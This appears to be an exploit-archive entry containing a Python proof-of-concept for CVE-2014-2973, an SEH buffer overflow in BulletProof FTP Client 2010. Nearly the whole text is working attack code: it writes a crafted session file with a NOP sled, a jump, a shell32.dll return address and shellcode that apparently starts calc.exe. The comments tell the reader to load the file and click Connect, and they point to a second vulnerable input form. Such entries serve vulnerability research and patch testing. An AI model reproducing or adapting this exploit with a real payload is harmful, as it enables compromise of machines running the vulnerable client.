BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit

1. # !/usr/bin/python
2. #-----------------------------------------------------------------------------#
3. # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit #
4. # Date: Sep 05 2014 #
5. # Vulnerability Discovery: Gabor Seljan #
6. # Exploit Author: Robert Kugler #
7. # Software Link: http://www.bpftp.com/ #
8. # Version: 2010.75.0.76 #
9. # Tested on: Windows XP #
10. # CVE: CVE-2014-2973 #
11. # #
12. # Thanks to corelanc0d3r for his awesome tutorials and help! ;-) #
13. # The "Enter URL" form is also vulnerable #
14. #-----------------------------------------------------------------------------#
15.  
16. buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
17. buffer+= "\x20" + "\x90" * 89
18. buffer+= "\xeb\x06\x90\x90"
19. buffer+= "\xA0\xB3\x3C\x77" # shell32.dll pop pop ret @773CB3A0
20. buffer+= "\x90" * 119 # 160 characters space
21. buffer+= ("\x33\xc0\x50\x68"
22. "\x2E\x65\x78\x65"
23. "\x68\x63\x61\x6C"
24. "\x63\x8B\xC4\x6A" # 36 bytes
25. "\x01\x50\xBB\x35" # ExitProcess is located at 0x77e598fd in kernel32.dll
26. "\xfd\xe4\x77\xFF"
27. "\xD3\x33\xc0\x50"
28. "\xc7\xc0\x8f\x4a"
29. "\xe5\x77\xff\xe0")
30.  
31. buffer+= "\x90" * (1000 - len(buffer))
32.  
33. # Just load the "BP Session" and click on "Connect".
34.  
35. file = open("ftpsession.bps","w")
36. file.write(buffer)
37. file.close()
38.  
39. # 6C256F618E2BF92C 1337day.com [2014-09-08] CFBC04BEFA26FA3E #